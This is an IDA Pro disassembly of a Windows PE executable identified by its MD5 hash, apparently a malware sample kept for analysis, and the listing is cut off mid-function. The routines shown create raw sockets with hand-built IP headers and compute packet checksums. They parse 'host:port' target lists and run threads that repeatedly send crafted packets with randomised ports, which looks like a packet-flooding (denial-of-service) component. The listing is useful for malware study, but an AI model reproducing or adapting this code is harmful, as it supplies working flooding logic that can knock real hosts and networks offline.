;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 25887EB1DB9A0A1F880BFF4FF21CEC79
; ---------------------------------------------------------------------------
; File Name : u:\work\25887eb1db9a0a1f880bff4ff21cec79_orig.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 000167FA ( 92154.)
; Section size in file : 00016800 ( 92160.)
; Offset to raw data for section: 00000400
; Flags 60000020: Text Executable Readable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
cmp cl, 40h
jnb short loc_40101A
cmp cl, 20h
jnb short loc_401010
shld edx, eax, cl
shl eax, cl
retn
; ---------------------------------------------------------------------------
loc_401010: ; CODE XREF: .text:00401008 j
mov edx, eax
xor eax, eax
and cl, 1Fh
shl edx, cl
retn
; ---------------------------------------------------------------------------
loc_40101A: ; CODE XREF: .text:00401003 j
xor eax, eax
xor edx, edx
retn
; ---------------------------------------------------------------------------
align 10h
cmp cl, 40h
jnb short loc_40103B
cmp cl, 20h
jnb short loc_401030
shrd eax, edx, cl
sar edx, cl
retn
; ---------------------------------------------------------------------------
loc_401030: ; CODE XREF: .text:00401028 j
mov eax, edx
sar edx, 1Fh
and cl, 1Fh
sar eax, cl
retn
; ---------------------------------------------------------------------------
loc_40103B: ; CODE XREF: .text:00401023 j
sar edx, 1Fh
mov eax, edx
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401050 proc near ; CODE XREF: sub_401050+29 p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_401072
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_4010B3
; ---------------------------------------------------------------------------
loc_401072: ; CODE XREF: loc_401072+8 j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_401080: ; CODE XREF: loc_401080+3A j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_401080
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_4010AE
cmp edx, [esp+8+arg_4]
ja short loc_4010AE
jb short loc_4010AF
cmp eax, [esp+8+arg_0]
jbe short loc_4010AF
loc_4010AE: ; CODE XREF: loc_4010AE+4E j
; sub_401050+54 j
dec esi
loc_4010AF: ; CODE XREF: loc_4010AF+56 j
; sub_401050+5C j
xor edx, edx
mov eax, esi
loc_4010B3: ; CODE XREF: loc_4010B3+20 j
pop esi
pop ebx
retn 10h
sub_401050 endp
; ---------------------------------------------------------------------------
align 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+14h]
or eax, eax
jge short loc_4010E1
inc edi
mov edx, [esp+10h]
neg eax
neg edx
sbb eax, 0
mov [esp+14h], eax
mov [esp+10h], edx
loc_4010E1: ; CODE XREF: .text:004010CB j
mov eax, [esp+1Ch]
or eax, eax
jge short loc_4010FD
inc edi
mov edx, [esp+18h]
neg eax
neg edx
sbb eax, 0
mov [esp+1Ch], eax
mov [esp+18h], edx
loc_4010FD: ; CODE XREF: .text:004010E7 j
or eax, eax
jnz short loc_401119
mov ecx, [esp+18h]
mov eax, [esp+14h]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+10h]
div ecx
mov edx, ebx
jmp short loc_40115A
; ---------------------------------------------------------------------------
loc_401119: ; CODE XREF: .text:004010FF j
mov ebx, eax
mov ecx, [esp+18h]
mov edx, [esp+14h]
mov eax, [esp+10h]
loc_401127: ; CODE XREF: .text:00401131 j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_401127
div ecx
mov esi, eax
mul dword ptr [esp+1Ch]
mov ecx, eax
mov eax, [esp+18h]
mul esi
add edx, ecx
jb short loc_401155
cmp edx, [esp+14h]
ja short loc_401155
jb short loc_401156
cmp eax, [esp+10h]
jbe short loc_401156
loc_401155: ; CODE XREF: .text:00401145 j
; .text:0040114B j
dec esi
loc_401156: ; CODE XREF: .text:0040114D j
; .text:00401153 j
xor edx, edx
mov eax, esi
loc_40115A: ; CODE XREF: .text:00401117 j
dec edi
jnz short loc_401164
neg edx
neg eax
sbb edx, 0
loc_401164: ; CODE XREF: .text:0040115B j
pop ebx
pop esi
pop edi
retn 10h
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401170 proc near ; CODE XREF: sub_401170+F p
; sub_40CFE7+20 p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_401189
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_401189: ; CODE XREF: loc_401189+E j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_401170 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4011B0 proc near ; CODE XREF: sub_4011B0+8 p
; sub_4080EA+8 p ...
arg_0 = byte ptr 4
cmp eax, 1000h
jnb short loc_4011C5
neg eax
add eax, esp
add eax, 4
test [eax], eax
xchg eax, esp
mov eax, [eax]
push eax
retn
; ---------------------------------------------------------------------------
loc_4011C5: ; CODE XREF: loc_4011C5+5 j
push ecx
lea ecx, [esp+4+arg_0]
loc_4011CA: ; CODE XREF: loc_4011CA+2C j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_4011CA
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_4011B0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4011ED proc near ; CODE XREF: sub_4011ED+1B p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
call ds:dword_4181E8
mov [esi+2], ax
pop esi
retn 4
sub_4011ED endp
; =============== S U B R O U T I N E =======================================
sub_401202 proc near ; CODE XREF: sub_401202+D p
mov eax, ecx
retn
sub_401202 endp
; =============== S U B R O U T I N E =======================================
sub_401205 proc near ; CODE XREF: sub_401205+E j
; sub_40444C+6E p ...
push esi
mov esi, ecx
mov ecx, [esi]
test ecx, ecx
jz short loc_401217
mov eax, [ecx]
push 1
call dword ptr [eax]
and dword ptr [esi], 0
loc_401217: ; CODE XREF: loc_401217+7 j
pop esi
retn
sub_401205 endp
; =============== S U B R O U T I N E =======================================
sub_401219 proc near ; CODE XREF: sub_401219+12 p
; sub_405E95+29 p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
mov esi, ecx
mov word ptr [esi], 2
call ds:dword_4181EC
push [esp+4+arg_4]
mov ecx, esi
mov [esi+4], eax
call sub_4011ED
mov eax, esi
pop esi
retn 8
sub_401219 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40123F proc near ; CODE XREF: sub_40123F+2A p
; sub_4067A5+1B p ...
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push esi
push [ebp+arg_4]
mov esi, ecx
push [ebp+arg_0]
lea ecx, [ebp+var_10]
call sub_401219
push [ebp+arg_8]
lea eax, [ebp+var_10]
push eax
mov ecx, esi
call sub_40DFF7
pop esi
leave
retn 0Ch
sub_40123F endp
; =============== S U B R O U T I N E =======================================
sub_401269 proc near ; CODE XREF: sub_401269+D p
; sub_404AAE+6 j
arg_0 = dword ptr 4
arg_4 = word ptr 8
arg_8 = dword ptr 0Ch
push esi
push 0Ch
call sub_40D0BB
test eax, eax
pop ecx
jz short loc_401281
mov ecx, eax
call sub_40DD7C
mov esi, eax
jmp short loc_401283
; ---------------------------------------------------------------------------
loc_401281: ; CODE XREF: loc_401281+B j
xor esi, esi
loc_401283: ; CODE XREF: loc_401283+16 j
push [esp+4+arg_8]
movzx eax, [esp+8+arg_4]
push eax
push [esp+0Ch+arg_0]
mov ecx, esi
call sub_40123F
cmp eax, 1
jnz short loc_4012A1
mov eax, esi
jmp short loc_4012AF
; ---------------------------------------------------------------------------
loc_4012A1: ; CODE XREF: loc_4012A1+32 j
test esi, esi
jz short loc_4012AD
mov eax, [esi]
push 1
mov ecx, esi
call dword ptr [eax]
loc_4012AD: ; CODE XREF: loc_4012AD+3A j
xor eax, eax
loc_4012AF: ; CODE XREF: loc_4012AF+36 j
pop esi
retn 0Ch
sub_401269 endp
; =============== S U B R O U T I N E =======================================
sub_4012B3 proc near ; CODE XREF: sub_4012B3+29F p
; sub_405675+106 p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_401269
mov esi, eax
test esi, esi
jz short loc_4012E1
push 10h
call sub_40D0BB
test eax, eax
pop ecx
jz short loc_4012E1
push esi
mov ecx, eax
call sub_40D341
jmp short loc_4012E3
; ---------------------------------------------------------------------------
loc_4012E1: ; CODE XREF: loc_4012E1+16 j
; sub_4012B3+22 j
xor eax, eax
loc_4012E3: ; CODE XREF: loc_4012E3+2C j
pop esi
retn 0Ch
sub_4012B3 endp
; =============== S U B R O U T I N E =======================================
sub_4012E7 proc near ; CODE XREF: sub_4012E7+13 p
; sub_4070A6+19 p ...
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
jz short locret_4012F9
push eax
push [esp+4+arg_0]
call sub_40DB5E
locret_4012F9: ; CODE XREF: locret_4012F9+6 j
retn 4
sub_4012E7 endp
; =============== S U B R O U T I N E =======================================
sub_4012FC proc near ; CODE XREF: sub_4012FC+7 p
; sub_401A43+11 p ...
arg_0 = dword ptr 4
push esi
xor eax, eax
push eax
push eax
push [esp+0Ch+arg_0]
mov esi, ecx
push eax
call CreateEventA
mov [esi], eax
mov eax, esi
pop esi
retn 4
sub_4012FC endp
; =============== S U B R O U T I N E =======================================
sub_401316 proc near ; CODE XREF: sub_401316+1F4 p
arg_0 = dword ptr 4
push 1
push [esp+4+arg_0]
push dword ptr [ecx]
call WaitForSingleObjectEx
neg eax
sbb eax, eax
inc eax
retn 4
sub_401316 endp
; =============== S U B R O U T I N E =======================================
sub_40132C proc near ; CODE XREF: sub_40132C+9C p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push dword ptr [esi+4]
call SetEvent
push [esp+4+arg_0]
lea ecx, [esi+28h]
call sub_4012E7
push dword ptr [esi+4]
call ResetEvent
pop esi
retn 4
sub_40132C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401351 proc near ; CODE XREF: sub_401351+30 p
var_5F4 = byte ptr -5F4h
var_5EC = dword ptr -5ECh
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 5F4h
push ebx
push esi
push edi
xor esi, esi
push esi
push esi
push esi
push esi
push 2
push 2
call WSASocketA
push esi
push esi
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 5F0h
lea eax, [ebp+var_5F4]
push eax
push esi
push esi
push 4004747Fh
push ebx
call WSAIoctl
mov eax, [ebp+var_4]
push 4Ch
xor edx, edx
pop ecx
div ecx
cmp eax, esi
jle short loc_4013BB
lea ecx, [ebp+var_5F4]
loc_4013A3: ; CODE XREF: loc_4013A3+68 j
mov edi, [ecx]
mov edx, edi
shr edx, 2
not edx
and edx, edi
test dl, 1
jnz short loc_4013C2
inc esi
add ecx, 4Ch
cmp esi, eax
jl short loc_4013A3
loc_4013BB: ; CODE XREF: loc_4013BB+4A j
xor eax, eax
loc_4013BD: ; CODE XREF: loc_4013BD+82 j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4013C2: ; CODE XREF: loc_4013C2+60 j
push ebx
call ds:dword_4181E4
imul esi, 4Ch
mov eax, [ebp+esi+var_5EC]
jmp short loc_4013BD
sub_401351 endp
; =============== S U B R O U T I N E =======================================
sub_4013D5 proc near ; CODE XREF: sub_4013D5+18 p
; sub_4017C3+29 p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
xor eax, eax
cmp byte ptr [esi], 3Ah
push edi
jz short loc_4013EF
loc_4013E2: ; CODE XREF: loc_4013E2+18 j
cmp byte ptr [eax+esi], 0
jz short loc_4013EF
inc eax
cmp byte ptr [eax+esi], 3Ah
jnz short loc_4013E2
loc_4013EF: ; CODE XREF: loc_4013EF+B j
; sub_4013D5+11 j
lea edi, [eax+esi]
inc eax
push eax
mov byte ptr [edi], 0
call sub_40CA18
pop ecx
mov ecx, [esp+8+arg_4]
push esi
push eax
mov [ecx], eax
call lstrcpyA
inc edi
push edi
call sub_40CE59
pop ecx
mov ecx, [esp+8+arg_8]
pop edi
mov [ecx], eax
xor eax, eax
pop esi
retn 0Ch
sub_4013D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401420 proc near ; CODE XREF: sub_401420+2C p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
xor edi, edi
cmp byte ptr [esi], 3Bh
jz short loc_401440
loc_40142F: ; CODE XREF: loc_40142F+1A j
cmp byte ptr [edi+esi], 0
jz short loc_40143C
inc edi
cmp byte ptr [edi+esi], 3Bh
jnz short loc_40142F
loc_40143C: ; CODE XREF: loc_40143C+13 j
test edi, edi
jnz short loc_401447
loc_401440: ; CODE XREF: loc_401440+D j
xor eax, eax
jmp loc_401504
; ---------------------------------------------------------------------------
loc_401447: ; CODE XREF: loc_401447+1E j
push ebx
push 10h
mov byte ptr [edi+esi], 0
call sub_40CA18
inc edi
push edi
mov ebx, eax
call sub_40CA18
pop ecx
pop ecx
push esi
push eax
mov [ebx], eax
call lstrcpyA
lea eax, [edi+esi]
mov [ebp+arg_0], eax
jmp short loc_401479
; ---------------------------------------------------------------------------
loc_401470: ; CODE XREF: loc_401470+5C j
cmp byte ptr [eax], 0
jz short loc_40147E
inc edi
lea eax, [edi+esi]
loc_401479: ; CODE XREF: loc_401479+4E j
cmp byte ptr [eax], 3Bh
jnz short loc_401470
loc_40147E: ; CODE XREF: loc_40147E+53 j
mov eax, edi
sub eax, [ebp+arg_0]
mov byte ptr [edi+esi], 0
lea eax, [eax+esi+1]
push eax
call sub_40CA18
pop ecx
push [ebp+arg_0]
mov [ebx+4], eax
push eax
call lstrcpyA
inc edi
lea ecx, [edi+esi]
mov al, [ecx]
jmp short loc_4014AF
; ---------------------------------------------------------------------------
loc_4014A7: ; CODE XREF: loc_4014A7+91 j
test al, al
jz short loc_4014B3
inc edi
mov al, [edi+esi]
loc_4014AF: ; CODE XREF: loc_4014AF+85 j
cmp al, 3Bh
jnz short loc_4014A7
loc_4014B3: ; CODE XREF: loc_4014B3+89 j
push ecx
call sub_40CE59
test eax, eax
pop ecx
mov [ebx+8], eax
jnz short loc_4014DD
push dword ptr [ebx]
call sub_40CCC5
push dword ptr [ebx+4]
call sub_40CCC5
push ebx
call sub_40CCC5
add esp, 0Ch
xor eax, eax
jmp short loc_401503
; ---------------------------------------------------------------------------
loc_4014DD: ; CODE XREF: loc_4014DD+9F j
inc edi
lea eax, [edi+esi]
mov ecx, eax
jmp short loc_4014EE
; ---------------------------------------------------------------------------
loc_4014E5: ; CODE XREF: loc_4014E5+D1 j
cmp byte ptr [eax], 0
jz short loc_4014F3
inc edi
lea eax, [edi+esi]
loc_4014EE: ; CODE XREF: loc_4014EE+C3 j
cmp byte ptr [eax], 3Bh
jnz short loc_4014E5
loc_4014F3: ; CODE XREF: loc_4014F3+C8 j
push ecx
mov byte ptr [edi+esi], 0
call sub_40CE59
mov [ebx+0Ch], eax
pop ecx
mov eax, ebx
loc_401503: ; CODE XREF: loc_401503+BB j
pop ebx
loc_401504: ; CODE XREF: loc_401504+22 j
pop edi
pop esi
pop ebp
retn 4
sub_401420 endp
; =============== S U B R O U T I N E =======================================
sub_40150A proc near ; CODE XREF: sub_40150A+FB p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi]
push edi
xor edi, edi
test eax, eax
jnz short loc_40151C
loc_401518: ; CODE XREF: loc_401518+1B j
xor eax, eax
jmp short loc_40153E
; ---------------------------------------------------------------------------
loc_40151C: ; CODE XREF: loc_40151C+C j
cmp byte ptr [eax], 0Ah
jz short loc_401530
loc_401521: ; CODE XREF: loc_401521+24 j
cmp byte ptr [eax+edi], 0
jz short loc_401518
inc edi
mov edx, eax
cmp byte ptr [edi+edx], 0Ah
jnz short loc_401521
loc_401530: ; CODE XREF: loc_401530+15 j
mov byte ptr [eax+edi], 0
push dword ptr [esi]
call sub_401420
inc edi
add [esi], edi
loc_40153E: ; CODE XREF: loc_40153E+10 j
pop edi
pop esi
retn 4
sub_40150A endp
; =============== S U B R O U T I N E =======================================
sub_401543 proc near ; CODE XREF: sub_401543+49 p
; sub_401621+65 p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push esi
xor esi, esi
cmp ecx, 1
jle short loc_40156E
lea eax, [ecx-2]
shr eax, 1
inc eax
mov edx, eax
neg edx
lea ecx, [ecx+edx*2]
mov edx, [esp+4+arg_0]
push edi
loc_401561: ; CODE XREF: loc_401561+26 j
movzx edi, word ptr [edx]
add esi, edi
inc edx
inc edx
dec eax
jnz short loc_401561
pop edi
jmp short loc_401572
; ---------------------------------------------------------------------------
loc_40156E: ; CODE XREF: loc_40156E+A j
mov edx, [esp+4+arg_0]
loc_401572: ; CODE XREF: loc_401572+29 j
test ecx, ecx
jz short loc_40157B
movzx eax, byte ptr [edx]
add esi, eax
loc_40157B: ; CODE XREF: loc_40157B+31 j
movzx eax, si
mov ecx, esi
shr ecx, 10h
add ecx, eax
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
pop esi
retn 8
sub_401543 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401592 proc near ; CODE XREF: sub_401592+7D p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
push 28h
mov [ebp+var_4], ecx
call sub_40CA18
mov esi, [ebp+arg_0]
pop ecx
push 7
pop ecx
push [ebp+arg_4]
mov ebx, eax
add esi, 14h
lea edi, [ebx+0Ch]
rep movsd
call ds:dword_4181E8
mov [ebx+0Ah], ax
mov eax, [ebp+arg_0]
mov ecx, [eax+0Ch]
mov [ebx], ecx
mov ecx, [eax+10h]
mov [ebx+4], ecx
mov al, [eax+9]
mov ecx, [ebp+var_4]
push 28h
push ebx
mov [ebx+9], al
call sub_401543
push ebx
movzx esi, ax
call sub_40CCC5
pop ecx
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn 8
sub_401592 endp
; =============== S U B R O U T I N E =======================================
sub_4015F3 proc near ; CODE XREF: sub_4015F3+C p
; sub_404FB3+15 p
push esi
push edi
mov esi, ecx
push dword ptr [esi]
call SetEvent
lea ecx, [esi+18h]
call sub_40B150
lea ecx, [esi+28h]
call sub_40DB59
push dword ptr [esi+4]
mov edi, ds:dword_4180A4 ; df--HS
call CloseHandle
push dword ptr [esi] ; df--HS
call CloseHandle
pop edi
pop esi
retn
sub_4015F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401621 proc near ; CODE XREF: sub_401621+12B p
var_10 = word ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_0], 0
push ebx
mov ebx, ecx
jnz short loc_401637
xor eax, eax
jmp loc_4016BE
; ---------------------------------------------------------------------------
loc_401637: ; CODE XREF: loc_401637+D j
mov eax, [ebp+arg_C]
push esi
push [ebp+arg_8]
mov esi, ds:dword_4181E8
mov [ebp+var_C], eax
mov dword_421018, eax
mov eax, [ebp+arg_4]
mov [ebp+var_10], 2
mov dword_421014, eax
call esi
push [ebp+arg_10]
mov word_42101C, ax
call esi
and word_421012, 0
push 14h
mov esi, offset dword_421008
push esi
mov ecx, ebx
mov word_42101E, ax
mov byte_421029, 2
call sub_401543
and word_42102C, 0
push 1Ch
push esi
mov ecx, ebx
mov word_421012, ax
call sub_401592
push 10h
mov word_42102C, ax
lea eax, [ebp+var_10]
push eax
push 0
push 30h
push esi
push [ebp+arg_0]
call ds:dword_4181D8
pop esi
loc_4016BE: ; CODE XREF: loc_4016BE+11 j
pop ebx
leave
retn 14h
sub_401621 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4016C3 proc near ; CODE XREF: sub_4016C3+115 p
var_10 = word ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_0], 0
push ebx
mov ebx, ecx
jnz short loc_4016D6
xor eax, eax
jmp short loc_401746
; ---------------------------------------------------------------------------
loc_4016D6: ; CODE XREF: loc_4016D6+D j
mov ecx, [ebp+arg_4]
mov eax, [ebp+arg_C]
and word_421042, 0
push esi
push 14h
mov dword_421044, ecx
mov esi, offset dword_421038
push esi
mov ecx, ebx
mov [ebp+var_10], 2
mov [ebp+var_C], eax
mov dword_421048, eax
mov byte_42104C, 8
call sub_401543
and word_42104E, 0
push 28h
push offset byte_42104C
mov ecx, ebx
mov word_421042, ax
call sub_401543
push 10h
mov word_42104E, ax
lea eax, [ebp+var_10]
push eax
push 0
push 3Ch
push esi
push [ebp+arg_0]
call ds:dword_4181D8
pop esi
loc_401746: ; CODE XREF: loc_401746+11 j
pop ebx
leave
retn 14h
sub_4016C3 endp
; =============== S U B R O U T I N E =======================================
sub_40174B proc near ; CODE XREF: sub_40174B+52 p
; sub_401FB8+1B p ...
arg_0 = dword ptr 4
push esi
push edi
push 8
mov esi, ecx
call sub_40D0BB
pop ecx
mov ecx, [esp+8+arg_0]
mov [eax+4], ecx
xor ecx, ecx
lea edi, [esi+4]
push edi
push ecx
push eax
push offset sub_4151FE
push ecx
push ecx
mov [eax], esi
call CreateThread
mov [esi], eax
mov eax, [edi]
pop edi
pop esi
retn 4
sub_40174B endp
; =============== S U B R O U T I N E =======================================
sub_40177E proc near ; CODE XREF: sub_40177E+BB p
; sub_416254+7F p ...
arg_0 = dword ptr 4
push esi
push edi
push 8
mov esi, ecx
call sub_40D0BB
pop ecx
mov ecx, [esp+8+arg_0]
lea edi, [esi+4]
push edi
push 4
push eax
push offset sub_4151FE
push 0
push 0
mov [eax], esi
mov [eax+4], ecx
call CreateThread
push 0FFFFFFF1h
push eax
mov [esi], eax
call SetThreadPriority
push dword ptr [esi]
call ResumeThread
mov eax, [edi]
pop edi
pop esi
retn 4
sub_40177E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017C3 proc near ; DATA XREF: sub_4017C3+35 o
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
push dword ptr [esi+4]
mov edi, ecx
call sub_4013D5
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_8]
push eax
push dword ptr [esi]
mov ecx, edi
call sub_4013D5
mov ecx, edi
call sub_401351
push [ebp+var_8]
mov [ebp+var_10], eax
call ds:dword_4181CC
push [ebp+var_4]
mov [ebp+arg_0], eax
mov eax, [esi+8]
mov [ebp+var_20], eax
call sub_40CCC5
push [ebp+var_8]
call sub_40CCC5
push dword ptr [esi]
call sub_40CCC5
push dword ptr [esi+4]
call sub_40CCC5
push esi
call sub_40CCC5
add esp, 14h
push 0FFh
push 3
push 2
call ds:dword_4181D0
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jz loc_401912
lea ecx, [ebp+var_18]
push 4
mov [ebp+var_1C], ecx
lea ecx, [ebp+var_1C]
push ecx
push 2
xor esi, esi
push 0
inc esi
push eax
mov [ebp+var_18], esi
call ds:dword_4181D4
test eax, eax
jnz loc_401912
cmp [ebp+arg_0], eax
jz loc_401912
mov eax, [ebp+var_10]
push ebx
mov ebx, [ebp+var_C]
push esi
mov esi, ds:dword_4180B0
mov [ebp+var_4], eax
jmp short loc_4018FD
; ---------------------------------------------------------------------------
loc_401891: ; CODE XREF: loc_401891+143 j
push 1
push 0
push dword ptr [edi]
call WaitForSingleObjectEx ; df--HS
test eax, eax
jz short loc_401908
cmp [ebp+var_C], 0
jnz short loc_4018B1
call GetTickCount
mov ebx, eax
and ebx, 0FFFFh
loc_4018B1: ; CODE XREF: loc_4018B1+DE j
cmp [ebp+var_10], 0
jnz short loc_4018C0
call GetTickCount
mov [ebp+var_4], eax
loc_4018C0: ; CODE XREF: loc_4018C0+F2 j
mov eax, [ebp+var_20]
dec eax
jz short loc_4018DF
dec eax
jnz short loc_4018F3
push [ebp+var_14]
mov ecx, edi
push [ebp+arg_0]
push ebx
push [ebp+var_4]
push [ebp+var_8]
call sub_4016C3
jmp short loc_4018F3
; ---------------------------------------------------------------------------
loc_4018DF: ; CODE XREF: loc_4018DF+101 j
push [ebp+var_14]
mov ecx, edi
push [ebp+arg_0]
push ebx
push [ebp+var_4]
push [ebp+var_8]
call sub_401621
loc_4018F3: ; CODE XREF: loc_4018F3+104 j
; sub_4017C3+11A j
push 0Ah
call Sleep
push 1
loc_4018FD: ; CODE XREF: loc_4018FD+CC j
push 0
push dword ptr [edi+4]
call WaitForSingleObjectEx ; df--HS
test eax, eax
jnz short loc_401891
loc_401908: ; CODE XREF: loc_401908+D8 j
push [ebp+var_8]
call ds:dword_4181E4
pop ebx
loc_401912: ; CODE XREF: loc_401912+87 j
; sub_4017C3+AC j ...
pop edi
pop esi
leave
retn 4
sub_4017C3 endp
; =============== S U B R O U T I N E =======================================
sub_401918 proc near ; DATA XREF: sub_401918+45 o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
push ebx
push ebp
push esi
push edi
mov ebx, ecx
loc_401920: ; CODE XREF: loc_401920+11C j
mov edi, ds:dword_4180B0
push 1
push 0
push dword ptr [ebx]
call WaitForSingleObjectEx ; df--HS
test eax, eax
jz loc_401A3A
push 1
push 64h
push dword ptr [ebx+4]
call WaitForSingleObjectEx ; df--HS
test eax, eax
jz loc_401A2A
mov eax, [ebx+28h]
test eax, eax
jz loc_401A2A
mov [esp+18h+var_4], eax
jmp loc_401A0C
; ---------------------------------------------------------------------------
loc_40195B: ; CODE XREF: loc_40195B+104 j
push 1
push 0
push dword ptr [ebx]
call WaitForSingleObjectEx ; df--HS
test eax, eax
jz loc_401A22
and [esp+18h+var_8], 0
cmp dword ptr [esi+0Ch], 0
jle short loc_4019F4
loc_401976: ; CODE XREF: loc_401976+DA j
push 1
push 0
push dword ptr [ebx]
call WaitForSingleObjectEx ; df--HS
test eax, eax
jz short loc_4019F4
push 10h
call sub_40CA18
push dword ptr [esi+4]
mov edi, eax
call sub_40CD83
inc eax
push eax
call sub_40CA18
mov [edi+4], eax
push dword ptr [esi+4]
push eax
call sub_40CD8E
push dword ptr [esi]
call sub_40CD83
inc eax
push eax
call sub_40CA18
mov [edi], eax
push dword ptr [esi]
push eax
call sub_40CD8E
mov eax, [esi+0Ch]
add esp, 24h
mov [edi+0Ch], eax
mov eax, [esi+8]
lea ebp, [ebx+8]
push edi
mov ecx, ebp
mov [edi+8], eax
call sub_40177E
push dword ptr [ebp+0]
call CloseHandle
inc [esp+18h+var_8]
mov eax, [esp+18h+var_8]
cmp eax, [esi+0Ch]
mov edi, ds:dword_4180B0
jl short loc_401976
loc_4019F4: ; CODE XREF: loc_4019F4+5C j
; sub_401918+68 j
push dword ptr [esi+4]
call sub_40CCC5
push dword ptr [esi]
call sub_40CCC5
push esi
call sub_40CCC5
add esp, 0Ch
loc_401A0C: ; CODE XREF: loc_401A0C+3E j
lea eax, [esp+18h+var_4]
push eax
mov ecx, ebx
call sub_40150A
mov esi, eax
test esi, esi
jnz loc_40195B
loc_401A22: ; CODE XREF: loc_401A22+4D j
